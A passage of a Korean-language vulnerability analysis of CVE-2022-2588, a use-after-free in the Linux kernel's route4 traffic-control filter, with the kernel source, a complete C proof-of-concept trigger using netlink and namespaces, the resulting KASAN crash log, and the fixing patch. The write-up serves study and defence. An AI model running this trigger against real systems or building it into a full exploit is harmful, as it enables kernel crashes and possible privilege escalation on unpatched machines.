49    tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
50    addattr64(&req.hdr, sizeof(req),
51              TCA_ROUTE4_TO,
52              to);
53    addattr64(&req.hdr, sizeof(req),
54              TCA_ROUTE4_FROM,
55              from);
56    addattr_nest_end(&req.hdr, tail);
57
58    err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
59    if (err < 0)
60        die("rtnl_talk");
61
62    rtnl_close(&rthdle);
63}
64
65int main(int argc, char *argv[])
66{
67    int res;
68
69    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
70    if (res == -1)
71        die("unshare");
72
73    user_tc_new_tfilter("lo",
74                   RTM_NEWTFILTER,
75                   NLM_F_CREATE,
76                   0x0,
77                   0xbeef, ETH_P_LOOP,
78                   "route",
79                   0x100000000, 0x100000000);
80    return 0;
81}

Putting it all together #

이제 지금까지 설명한 것과 필터를 교체하는 것을 합쳐서 UAF를 트리거해보자. 먼저 필터 교체를 하려면 상기에 언급한 어트리뷰트 중 TCA_ROUTE4FROM과 TCA_ROUTE4TO가 기존 값들과 다르게 하여 새 필터를 생성해야 한다. 왜냐하면 이미 존재하는 경우에는 EEXIST 오류가 발생가능하기 때문이다. 이는 route4_setparms 함수로 알 수 있다 (net/sched/cls_route.c에서 발췌)[3].

 1static int route4_set_parms(struct net *net, struct tcf_proto *tp,
 2              unsigned long base, struct route4_filter *f,
 3              u32 handle, struct route4_head *head,
 4              struct nlattr **tb, struct nlattr *est, int new,
 5              u32 flags, struct netlink_ext_ack *extack)
 6{
 7  u32 id = 0, to = 0, nhandle = 0x8000;
 8  struct route4_filter *fp;
 9  unsigned int h1;
10  struct route4_bucket *b;
11  int err;
12
13  err = tcf_exts_validate(net, tp, tb, est, &f->exts, flags, extack);
14  if (err < 0)
15      return err;
16
17  if (tb[TCA_ROUTE4_TO]) {
18      if (new && handle & 0x8000)
19          return -EINVAL;
20      to = nla_get_u32(tb[TCA_ROUTE4_TO]);
21      if (to > 0xFF)
22          return -EINVAL;
23      nhandle = to;
24  }
25
26  if (tb[TCA_ROUTE4_FROM]) {
27      if (tb[TCA_ROUTE4_IIF])
28          return -EINVAL;
29      id = nla_get_u32(tb[TCA_ROUTE4_FROM]);
30      if (id > 0xFF)
31          return -EINVAL;
32      nhandle |= id << 16;
33  } else if (tb[TCA_ROUTE4_IIF]) {
34      id = nla_get_u32(tb[TCA_ROUTE4_IIF]);
35      if (id > 0x7FFF)
36          return -EINVAL;
37      nhandle |= (id | 0x8000) << 16;
38  } else
39      nhandle |= 0xFFFF << 16;
40
41  if (handle && new) {
42      nhandle |= handle & 0x7F00;
43      if (nhandle != handle)
44          return -EINVAL;
45  }
46
47  h1 = to_hash(nhandle);
48  b = rtnl_dereference(head->table[h1]);
49  if (!b) {
50      b = kzalloc(sizeof(struct route4_bucket), GFP_KERNEL);
51      if (b == NULL)
52          return -ENOBUFS;
53
54      rcu_assign_pointer(head->table[h1], b);
55  } else {
56      unsigned int h2 = from_hash(nhandle >> 16);
57
58      for (fp = rtnl_dereference(b->ht[h2]);
59           fp;
60           fp = rtnl_dereference(fp->next))
61          if (fp->handle == f->handle)
62              return -EEXIST;
63  }
64
65    /* ... */
66
67  return 0;
68}

그럼 다음과 같이 UAF를 트리거하는 코드를 작성할 수 있다[8].

  1#define _GNU_SOURCE
  2
  3#include <stdio.h>
  4#include <string.h>
  5#include <stdlib.h>
  6#include <stdint.h>
  7#include <stdbool.h>
  8#include <signal.h>
  9#include <time.h>
 10#include <sys/mman.h>
 11#include <sys/types.h>
 12#include <sys/utsname.h>
 13#include <sys/wait.h>
 14#include <sys/socket.h>
 15#include <sys/ioctl.h>
 16#include <sys/uio.h>
 17#include <unistd.h>
 18#include <sched.h>
 19#include <fcntl.h>
 20#include <syslog.h>
 21#include <errno.h>
 22#include <netinet/in.h>
 23#include <arpa/inet.h>
 24#include <net/if.h>
 25#include <net/if_arp.h>
 26#include <linux/if_link.h>
 27#include <linux/neighbour.h>
 28#include <linux/netconf.h>
 29#include <linux/if_ether.h>
 30#include <asm/types.h>
 31#include <linux/netlink.h>
 32#include <linux/rtnetlink.h>
 33#include <libnl3/netlink/route/tc.h>
 34#include <libnl3/netlink/route/qdisc.h>
 35#include <libnl3/netlink/route/qdisc/tbf.h>
 36
 37/* ----------------------< libnetlink >--------------------------------- */
 38
 39struct rtnl_handle {
 40  int         fd;
 41  struct sockaddr_nl  local;
 42  struct sockaddr_nl  peer;
 43  __u32           seq;
 44  __u32           dump;
 45  int         proto;
 46  FILE               *dump_fp;
 47#define RTNL_HANDLE_F_LISTEN_ALL_NSID     0x01
 48  int         flags;
 49};
 50
 51#define NLMSG_TAIL(nmsg) \
 52  ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
 53
 54
 55static inline const char *rta_getattr_str(const struct rtattr *rta)
 56{
 57  return (const char *)RTA_DATA(rta);
 58}
 59
 60static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
 61        int alen)
 62{
 63  int len = RTA_LENGTH(alen);
 64  struct rtattr *rta;
 65
 66  if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
 67      fprintf(stderr,
 68          "addattr_l ERROR: message exceeded bound of %d\n",
 69          maxlen);
 70      return -1;
 71  }
 72  rta = NLMSG_TAIL(n);
 73  rta->rta_type = type;
 74  rta->rta_len = len;
 75  memcpy(RTA_DATA(rta), data, alen);
 76  n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
 77  return 0;
 78}
 79
 80static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
 81{
 82  return addattr_l(n, maxlen, type, &data, sizeof(__u32));
 83}
 84
 85static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
 86{
 87  return addattr_l(n, maxlen, type, &data, sizeof(__u64));
 88}
 89
 90static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
 91{
 92  struct rtattr *nest = NLMSG_TAIL(n);
 93
 94  addattr_l(n, maxlen, type, NULL, 0);
 95    /* addattr_l(n, maxlen, type, &nest, 8); */
 96  return nest;
 97}
 98
 99static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
100{
101  nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
102  return n->nlmsg_len;
103}
104
105#ifndef SOL_NETLINK
106#define SOL_NETLINK 270
107#endif
108
109#ifndef MIN
110#define MIN(a, b) ((a) < (b) ? (a) : (b))
111#endif
112
113static int rcvbuf =1024 * 1024;
114
115static void rtnl_close(struct rtnl_handle *rth)
116{
117  if (rth->fd >= 0) {
118      close(rth->fd);
119      rth->fd = -1;
120  }
121}
122
123static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
124            int protocol)
125{
126  socklen_t addr_len;
127  int sndbuf = 32768;
128
129  memset(rth, 0, sizeof(*rth));
130
131  rth->proto = protocol;
132  rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
133  if (rth->fd < 0) {
134      perror("Cannot open netlink socket");
135      return -1;
136  }
137
138  if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
139             &sndbuf, sizeof(sndbuf)) < 0) {
140      perror("SO_SNDBUF");
141      return -1;
142  }
143
144  if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
145             &rcvbuf, sizeof(rcvbuf)) < 0) {
146      perror("SO_RCVBUF");
147      return -1;
148  }
149
150  memset(&rth->local, 0, sizeof(rth->local));
151  rth->local.nl_family = AF_NETLINK;
152  rth->local.nl_groups = subscriptions;
153
154  if (bind(rth->fd, (struct sockaddr *)&rth->local,
155       sizeof(rth->local)) < 0) {
156      perror("Cannot bind netlink socket");
157      return -1;
158  }
159  addr_len = sizeof(rth->local);
160  if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
161          &addr_len) < 0) {
162      perror("Cannot getsockname");
163      return -1;
164  }
165  if (addr_len != sizeof(rth->local)) {
166      fprintf(stderr, "Wrong address length %d\n", addr_len);
167      return -1;
168  }
169  if (rth->local.nl_family != AF_NETLINK) {
170      fprintf(stderr, "Wrong address family %d\n",
171          rth->local.nl_family);
172      return -1;
173  }
174  rth->seq = time(NULL);
175  return 0;
176}
177
178static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
179{
180  return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
181}
182
183static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
184             struct nlmsghdr *answer, size_t maxlen,
185             bool show_rtnl_err)
186{
187  int status;
188  unsigned int seq;
189  struct nlmsghdr *h;
190  struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
191  struct iovec iov = {
192      .iov_base = n,
193      .iov_len = n->nlmsg_len
194  };
195  struct msghdr msg = {
196      .msg_name = &nladdr,
197      .msg_namelen = sizeof(nladdr),
198      .msg_iov = &iov,
199      .msg_iovlen = 1,
200  };
201  char   buf[32768] = {};
202
203  n->nlmsg_seq = seq = ++rtnl->seq;
204
205  if (answer == NULL)
206      n->nlmsg_flags |= NLM_F_ACK;
207
208  status = sendmsg(rtnl->fd, &msg, 0);
209  if (status < 0) {
210      perror("Cannot talk to rtnetlink");
211      return -1;
212  }
213
214  iov.iov_base = buf;
215  while (1) {
216      iov.iov_len = sizeof(buf);
217      status = recvmsg(rtnl->fd, &msg, 0);
218
219      if (status < 0) {
220          if (errno == EINTR || errno == EAGAIN)
221              continue;
222          fprintf(stderr, "netlink receive error %s (%d)\n",
223              strerror(errno), errno);
224          return -1;
225      }
226      if (status == 0) {
227          fprintf(stderr, "EOF on netlink\n");
228          return -1;
229      }
230      if (msg.msg_namelen != sizeof(nladdr)) {
231          fprintf(stderr,
232              "sender address length == %d\n",
233              msg.msg_namelen);
234          exit(1);
235      }
236      for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
237          int len = h->nlmsg_len;
238          int l = len - sizeof(*h);
239
240            /* DumpHex(&msg, len); */
241
242          if (l < 0 || len > status) {
243              if (msg.msg_flags & MSG_TRUNC) {
244                  fprintf(stderr, "Truncated message\n");
245                  return -1;
246              }
247              fprintf(stderr,
248                  "!!!malformed message: len=%d\n",
249                  len);
250              exit(1);
251          }
252
253          if (nladdr.nl_pid != 0 ||
254              h->nlmsg_pid != rtnl->local.nl_pid ||
255              h->nlmsg_seq != seq) {
256              /* Don't forget to skip that message. */
257              status -= NLMSG_ALIGN(len);
258              h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
259              continue;
260          }
261
262          if (h->nlmsg_type == NLMSG_ERROR) {
263              struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);
264
265              if (l < sizeof(struct nlmsgerr)) {
266                  fprintf(stderr, "ERROR truncated\n");
267              } else if (!err->error) {
268                  if (answer)
269                      memcpy(answer, h,
270                             MIN(maxlen, h->nlmsg_len));
271                  return 0;
272              }
273
274              if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
275                  fprintf(stderr,
276                      "RTNETLINK answers: %s\n",
277                      strerror(-err->error));
278              errno = -err->error;
279              return -1;
280          }
281
282          if (answer) {
283              memcpy(answer, h,
284                     MIN(maxlen, h->nlmsg_len));
285              return 0;
286          }
287
288          fprintf(stderr, "Unexpected reply!!!\n");
289
290          status -= NLMSG_ALIGN(len);
291          h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
292      }
293
294      if (msg.msg_flags & MSG_TRUNC) {
295          fprintf(stderr, "Message truncated\n");
296          continue;
297      }
298
299      if (status) {
300          fprintf(stderr, "!!!Remnant of size %d\n", status);
301          exit(1);
302      }
303  }
304}
305
306static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
307        struct nlmsghdr *answer, size_t maxlen)
308{
309  return __rtnl_talk(rtnl, n, answer, maxlen, true);
310}
311
312static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
313             int len, unsigned short flags)
314{
315  unsigned short type;
316
317  memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
318  while (RTA_OK(rta, len)) {
319      type = rta->rta_type & ~flags;
320      if ((type <= max) && (!tb[type]))
321          tb[type] = rta;
322      rta = RTA_NEXT(rta, len);
323  }
324  if (len)
325      fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
326          len, rta->rta_len);
327  return 0;
328}
329
330/* --------------------------------------------------------------------- */
331
332enum {
333    TCA_BUF_MAX = (64 * 1024)
334};
335
336struct tc_req {
337    struct nlmsghdr hdr;
338    struct tcmsg tchdr;
339    uint8_t buf[TCA_BUF_MAX];
340};
341
342void die(const char *funcname)
343{
344    perror(funcname);
345    exit(EXIT_FAILURE);
346}
347
348#define LOG printf
349#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
350
351void print_qdisc_info(const char *ifname)
352{
353    int err;
354    struct nlmsghdr res;
355    struct tcmsg *t;
356    struct rtattr *tb[TCA_MAX + 1];
357    struct rtnl_handle rth;
358    struct tc_req qdreq;
359
360    LOG_FUNC();
361
362    err = rtnl_open(&rth, 0);
363    if (err)
364        die("rtnl_open");
365
366    bzero(&qdreq, sizeof(qdreq));
367    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
368    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
369    qdreq.hdr.nlmsg_type = RTM_GETQDISC;
370
371    qdreq.tchdr.tcm_family = AF_UNSPEC;
372    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
373
374    LOG("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);
375
376    err = rtnl_talk(&rth, &qdreq.hdr, &res, TCA_BUF_MAX);
377    if (err < 0)
378        die("rtnl_talk");
379
380    t = NLMSG_DATA(&res);
381    if (res.nlmsg_type != RTM_NEWQDISC && res.nlmsg_type != RTM_DELQDISC)
382        die("Not a qdisc");
383
384    parse_rtattr_flags(tb,
385                       TCA_MAX,
386                       TCA_RTA(t),
387                       res.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
388                       NLA_F_NESTED);
389    printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
390           t->tcm_handle >> 16, t->tcm_handle);
391
392    rtnl_close(&rth);
393}
394
395void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
396                     uint32_t handle, const char *kind)
397{
398    int err;
399    struct rtnl_handle rth;
400    struct tc_req qdreq;
401    struct rtattr *tail;
402    struct tc_htb_glob glob;
403
404    LOG_FUNC();
405
406    err = rtnl_open(&rth, 0);
407    if (err)
408        die("rtnl_open");
409
410    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
411    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
412    qdreq.hdr.nlmsg_type = cmd;
413
414    qdreq.tchdr.tcm_family = AF_UNSPEC;
415    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
416    qdreq.tchdr.tcm_handle = handle;
417    qdreq.tchdr.tcm_parent = TC_H_ROOT;
418
419    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
420    tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
421    bzero(&glob, sizeof(glob));
422    glob.version = 0x00030011 >> 16;
423    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
424              &glob, sizeof(glob));
425    addattr_nest_end(&qdreq.hdr, tail);
426
427    err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
428    if (err < 0)
429        die("rtnl_talk");
430
431    rtnl_close(&rth);
432}
433
434void user_tc_new_tfilter(const char *ifname, int cmd,
435                    unsigned int flags, uint32_t handle, uint16_t prio,
436                    uint16_t proto,
437                    const char *kind, uint64_t from, uint64_t to)
438{
439    int err;
440    struct rtnl_handle rthdle;
441    struct tc_req req;
442    struct rtattr *tail;
443
444    LOG_FUNC();
445
446    err = rtnl_open(&rthdle, 0);
447    if (err < 0)
448        die("rtnl_open");
449
450    bzero(&req, sizeof(req));
451    req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
452    req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
453    req.hdr.nlmsg_type = cmd;
454
455    req.tchdr.tcm_family = AF_UNSPEC;
456    req.tchdr.tcm_ifindex = if_nametoindex(ifname);
457    req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
458    req.tchdr.tcm_handle = handle;
459
460    addattr_l(&req.hdr, sizeof(req),
461              TCA_KIND,
462              kind, strlen(kind));
463    tail = addattr_nest(&req.hdr, sizeof(req), TCA_OPTIONS);
464    addattr64(&req.hdr, sizeof(req),
465              TCA_ROUTE4_TO,
466              to);
467    addattr64(&req.hdr, sizeof(req),
468              TCA_ROUTE4_FROM,
469              from);
470    addattr_nest_end(&req.hdr, tail);
471
472    err = rtnl_talk(&rthdle, &req.hdr, NULL, 0);
473    if (err < 0)
474        die("rtnl_talk");
475
476    rtnl_close(&rthdle);
477}
478
479int main(int argc, char *argv[])
480{
481    int res;
482
483    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
484    if (res == -1)
485        die("unshare");
486
487    user_tc_modify_qdisc("lo",
488                    RTM_NEWQDISC,
489                    NLM_F_CREATE,
490                    0x10000,
491                    "htb");
492    print_qdisc_info("lo");
493
494    user_tc_new_tfilter("lo",
495                   RTM_NEWTFILTER,
496                   NLM_F_CREATE,
497                   0x0,
498                   0xbeef, ETH_P_LOOP,
499                   "route",
500                   0x100000000, 0x100000000);
501    user_tc_new_tfilter("lo",
502                   RTM_NEWTFILTER,
503                   NLM_F_CREATE,
504                   0x0,
505                   0xbeef, ETH_P_LOOP,
506                   "route",
507                   0x1, 0x1);
508    return 0;
509}

위 코드를 다음과 같이 컴파일 한 후,

1#!/bin/bash
2
3src=$1
4exe=${src:0:-2}
5
6gcc -I/usr/include/libnl3/ $src -o $exe -lnl-3 -lmnl -lnl-route-3

실행하면 다음을 얻는다.

  1[ 3136.361496] ==================================================================
  2[ 3136.364037] BUG: KASAN: use-after-free in route4_destroy+0x190/0x4d0 [cls_route]
  3[ 3136.365314] Read of size 8 at addr ffff88800ba2d000 by task kworker/u4:0/1427
  4[ 3136.366115] 
  5[ 3136.366350] CPU: 1 PID: 1427 Comm: kworker/u4:0 Not tainted 5.18.0 #1
  6[ 3136.367041] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
  7[ 3136.368194] Workqueue: netns cleanup_net
  8[ 3136.368693] Call Trace:
  9[ 3136.369014]  <TASK>
 10[ 3136.369306]  dump_stack_lvl+0x49/0x60
 11[ 3136.369757]  print_report.cold+0x5e/0x5d0
 12[ 3136.370253]  ? route4_destroy+0x190/0x4d0 [cls_route]
 13[ 3136.370831]  kasan_report+0xaa/0x120
 14[ 3136.371282]  ? route4_destroy+0x190/0x4d0 [cls_route]
 15[ 3136.371856]  __asan_load8+0x87/0xb0
 16[ 3136.372285]  route4_destroy+0x190/0x4d0 [cls_route]
 17[ 3136.372842]  ? route4_init+0x60/0x60 [cls_route]
 18[ 3136.373404]  ? __kasan_check_write+0x14/0x20
 19[ 3136.373909]  ? mutex_unlock+0x81/0xd0
 20[ 3136.374367]  tcf_proto_destroy+0x54/0x150
 21[ 3136.374863]  tcf_proto_put+0x5b/0x80
 22[ 3136.375300]  tcf_chain_flush+0xdf/0x150
 23[ 3136.375759]  __tcf_block_put+0xea/0x1c0
 24[ 3136.376458]  tcf_block_put+0xca/0x110
 25[ 3136.376928]  ? tcf_block_put_ext+0x60/0x60
 26[ 3136.377424]  htb_destroy+0xed/0x760 [sch_htb]
 27[ 3136.377943]  ? rcu_exp_wait_wake+0x570/0x570
 28[ 3136.378455]  ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
 29[ 3136.379140]  ? htb_reset+0x1dd/0x2a0 [sch_htb]
 30[ 3136.379699]  ? qdisc_reset+0x1dd/0x280
 31[ 3136.380268]  qdisc_destroy+0x63/0x150
 32[ 3136.380764]  qdisc_put+0x6b/0x80
 33[ 3136.381373]  dev_shutdown+0x129/0x180
 34[ 3136.382049]  unregister_netdevice_many+0x4dd/0xc50
 35[ 3136.382872]  ? __kasan_check_read+0x11/0x20
 36[ 3136.383549]  ? dev_cpu_dead+0x400/0x400
 37[ 3136.384121]  ? unregister_netdevice_many+0xc50/0xc50
 38[ 3136.384876]  default_device_exit_batch+0x2df/0x370
 39[ 3136.385603]  ? __dev_change_net_namespace+0xaf0/0xaf0
 40[ 3136.386357]  ops_exit_list+0x92/0xa0
 41[ 3136.386927]  cleanup_net+0x2f3/0x5e0
 42[ 3136.387493]  ? unregister_pernet_device+0x60/0x60
 43[ 3136.388204]  ? rtnl_unlock+0xe/0x20
 44[ 3136.388757]  process_one_work+0x44f/0x740
 45[ 3136.389400]  worker_thread+0x2bb/0x6f0
 46[ 3136.389986]  ? process_one_work+0x740/0x740
 47[ 3136.390629]  kthread+0x179/0x1b0
 48[ 3136.392849]  ? kthread_complete_and_exit+0x30/0x30
 49[ 3136.395048]  ret_from_fork+0x22/0x30
 50[ 3136.397079]  </TASK>
 51[ 3136.398830] 
 52[ 3136.400410] Allocated by task 1445:
 53[ 3136.402366] 
 54[ 3136.403954] Freed by task 1427:
 55[ 3136.405785] 
 56[ 3136.407233] Last potentially related work creation:
 57[ 3136.409123] 
 58[ 3136.410537] Second to last potentially related work creation:
 59[ 3136.412539] 
 60[ 3136.414005] The buggy address belongs to the object at ffff88800ba2d000
 61[ 3136.414005]  which belongs to the cache kmalloc-192 of size 192
 62[ 3136.418199] The buggy address is located 0 bytes inside of
 63[ 3136.418199]  192-byte region [ffff88800ba2d000, ffff88800ba2d0c0)
 64[ 3136.422262] 
 65[ 3136.423764] The buggy address belongs to the physical page:
 66[ 3136.425828] 
 67[ 3136.427344] Memory state around the buggy address:
 68[ 3136.429290]  ffff88800ba2cf00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 69[ 3136.431594]  ffff88800ba2cf80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 70[ 3136.433601] >ffff88800ba2d000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 71[ 3136.435610]                    ^
 72[ 3136.437281]  ffff88800ba2d080: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
 73[ 3136.439355]  ffff88800ba2d100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 74[ 3136.441418] ==================================================================
 75[ 3136.444173] general protection fault, probably for non-canonical address 0x92a000ea00000593: 0000 [#1] PREEMPT SMP KASAN PTI
 76[ 3136.447177] CPU: 1 PID: 1427 Comm: kworker/u4:0 Tainted: G    B   W         5.18.0 #1
 77[ 3136.449696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
 78[ 3136.452337] Workqueue: netns cleanup_net
 79[ 3136.454369] RIP: 0010:tcf_action_destroy+0x85/0xd0
 80[ 3136.456484] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
 81[ 3136.461858] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
 82[ 3136.464262] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
 83[ 3136.466742] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
 84[ 3136.469217] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
 85[ 3136.471680] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
 86[ 3136.474156] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
 87[ 3136.476624] FS:  0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
 88[ 3136.479227] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 89[ 3136.481859] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0
 90[ 3136.484757] Call Trace:
 91[ 3136.487477]  <TASK>
 92[ 3136.490650]  tcf_exts_destroy+0x2e/0x60
 93[ 3136.493054]  route4_destroy+0x2ee/0x4d0 [cls_route]
 94[ 3136.495654]  ? route4_init+0x60/0x60 [cls_route]
 95[ 3136.498213]  ? __kasan_check_write+0x14/0x20
 96[ 3136.500784]  ? mutex_unlock+0x81/0xd0
 97[ 3136.503186]  tcf_proto_destroy+0x54/0x150
 98[ 3136.505625]  tcf_proto_put+0x5b/0x80
 99[ 3136.508134]  tcf_chain_flush+0xdf/0x150
100[ 3136.510616]  __tcf_block_put+0xea/0x1c0
101[ 3136.513100]  tcf_block_put+0xca/0x110
102[ 3136.515600]  ? tcf_block_put_ext+0x60/0x60
103[ 3136.518110]  htb_destroy+0xed/0x760 [sch_htb]
104[ 3136.520595]  ? rcu_exp_wait_wake+0x570/0x570
105[ 3136.523096]  ? htb_destroy_class_offload+0x830/0x830 [sch_htb]
106[ 3136.525794]  ? htb_reset+0x1dd/0x2a0 [sch_htb]
107[ 3136.528551]  ? qdisc_reset+0x1dd/0x280
108[ 3136.531346]  qdisc_destroy+0x63/0x150
109[ 3136.534156]  qdisc_put+0x6b/0x80
110[ 3136.536581]  dev_shutdown+0x129/0x180
111[ 3136.539066]  unregister_netdevice_many+0x4dd/0xc50
112[ 3136.541621]  ? __kasan_check_read+0x11/0x20
113[ 3136.544207]  ? dev_cpu_dead+0x400/0x400
114[ 3136.546622]  ? unregister_netdevice_many+0xc50/0xc50
115[ 3136.549100]  default_device_exit_batch+0x2df/0x370
116[ 3136.551570]  ? __dev_change_net_namespace+0xaf0/0xaf0
117[ 3136.554065]  ops_exit_list+0x92/0xa0
118[ 3136.556520]  cleanup_net+0x2f3/0x5e0
119[ 3136.558804]  ? unregister_pernet_device+0x60/0x60
120[ 3136.561209]  ? rtnl_unlock+0xe/0x20
121[ 3136.563448]  process_one_work+0x44f/0x740
122[ 3136.565930]  worker_thread+0x2bb/0x6f0
123[ 3136.568190]  ? process_one_work+0x740/0x740
124[ 3136.570541]  kthread+0x179/0x1b0
125[ 3136.572620]  ? kthread_complete_and_exit+0x30/0x30
126[ 3136.574997]  ret_from_fork+0x22/0x30
127[ 3136.577103]  </TASK>
128[ 3136.578972] Modules linked in: cls_route sch_htb isofs binfmt_misc nls_iso8859_1 ppdev joydev input_leds parport_pc serio_raw mac_hid parporti
129[ 3136.592765] ---[ end trace 0000000000000000 ]---
130[ 3136.595224] RIP: 0010:tcf_action_destroy+0x85/0xd0
131[ 3136.597666] Code: ff 48 83 c3 08 48 39 5d d0 74 55 48 89 df e8 f2 ed 31 ff 4c 8b 23 4d 85 e4 74 45 48 c7 03 00 00 00 00 4c 89 e7 e8 db ed 31 f
132[ 3136.603930] RSP: 0018:ffff888102d0f6a8 EFLAGS: 00010296
133[ 3136.606569] RAX: 0000000000000000 RBX: ffff888107ef9008 RCX: ffffffffa622a125
134[ 3136.609403] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 92a000ea00000593
135[ 3136.612241] RBP: ffff888102d0f6d8 R08: 0000000000000001 R09: 0000000000000003
136[ 3136.615034] R10: ffffed1001745a04 R11: 0000000000000001 R12: 92a000ea00000593
137[ 3136.617558] R13: 0000000000000001 R14: ffff8881041b8540 R15: 0000000000000000
138[ 3136.620093] FS:  0000000000000000(0000) GS:ffff888109b00000(0000) knlGS:0000000000000000
139[ 3136.622819] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
140[ 3136.625241] CR2: 0000564fe64f7650 CR3: 0000000106a8c000 CR4: 00000000000006e0

Patch #

이 취약점은 해제되는 fold 포인터 변수가 NULL이 아닌 것 이외에 그 핸들 값도 같은 방식으로 검사하였기 때문에 발생하였다. 그래서 패치는 fold 포인터 변수만 검사하는 방식으로 다음과 같이 진행됐다[12].

 1diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
 2index a35ab8c27866..3f935cbbaff6 100644
 3--- a/net/sched/cls_route.c
 4+++ b/net/sched/cls_route.c
 5@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
 6  rcu_assign_pointer(f->next, f1);
 7  rcu_assign_pointer(*fp, f);
 8
 9- if (fold && fold->handle && f->handle != fold->handle) {
10+ if (fold) {
11      th = to_hash(fold->handle);
12      h = from_hash(fold->handle >> 16);
13      b = rtnl_dereference(head->table[th]);
14--

References #

  1. 0xCD4, "kernel-ctf-lab." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/0xCD4/kernel-ctf-lab
  2. "CVE-2022-2588 Detail." nvd.nist.gov, Accessed: May. 26, 2026. [Online]. Available: https://nvd.nist.gov/vuln/detail/cve-2022-2588
  3. Linus Torvalds et al., "Linux kernel", (Version 5.18) [Source Code]. https://github.com/torvalds/linux
  4. "netlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/netlink.7.html
  5. "rtnetlink(7) — Linux manual page." man7.org, Accessed: May. 26, 2026. [Online]. Available: https://man7.org/linux/man-pages/man7/rtnetlink.7.html
  6. "Introduction to Netlink." docs.kernel.org, Accessed: May. 26, 2026. [Online]. Available: https://docs.kernel.org/userspace-api/netlink/intro.html
  7. moises-silva, "libnetlink examples." github.com, Accessed: May. 26, 2026. [Online]. Available: https://github.com/moises-silva/libnetlink-examples/tree/master
